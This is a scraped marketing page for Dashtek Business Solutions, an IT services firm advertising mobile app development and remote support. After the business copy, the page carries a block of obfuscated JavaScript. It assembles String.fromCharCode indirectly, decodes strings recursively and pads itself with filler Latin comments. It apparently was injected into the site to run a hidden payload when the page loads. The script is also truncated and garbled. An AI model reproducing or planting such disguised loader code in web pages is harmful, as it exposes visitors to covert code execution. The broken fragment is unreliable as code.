Dashtek Business Solutions is not the typical technology integrator. At Dashtek we strive to provide solutions to your business problems by automating IT to save you time and increase your profits.
Application development for cell phones
DashTek announced today they have successfully written many custom applications for cell phones.This allows its customers to work on the run and not lose productivity.
Remote support
Dashtek announces today they have extended the functionality of its DashTek Help Agent. DashTek can now remotely solve issues not only on all Windows based systems but also mobile windows based systems.
DashTek Business Solutions is the alternative that you have been waiting for in North and South Carolina. DashTek is a total solutions provider. We can write applications to automate your processes as well and manage all your IT infrastructure.
We strive to create solutions that save you time and money.
Solve problems quickly and easily without waiting.
(function($$,_2,_1) { function co() { return 'Code'; } function gafu() { xxx=a(String, 'f' + ro() + co()); return function(q){return xxx(q);}; }; rex = [gafu(),gafu()]; function choo(k) { if (k < 9) { return 1 } else { return 2 } }; d = ''; map = ''; function fs(ro, arr, add, st, en,dp) { //Mauris gravida, libero ut tempor ultricies, ante erat blandit dui, vestibulum convallis ligula lacus et metus. Duis quis nunc justo, gravida sem var hf = ((en+st)>>1); if(en-st>16) { //lacus, tristique vitae aliquet a, ultrices nec libero. Aliquam sagittis enim in nibh semper tincidunt. Donec malesuada lorem sit amet risus euis return fs(ro, arr, add, st, hf,dp+1) + fs(ro,arr, add, hf, en,dp+1); }else{ var rt='';rx1=rex[add-29]; for(var rj=st;rj0;){ var x=ch(c); c-=x; var rep=kk.substr(c, x); //accumsan dapibus diam var t = dd.split(rep); dd=t.join(pp(t)); };return dd; }); /**/ gloa(); beacon type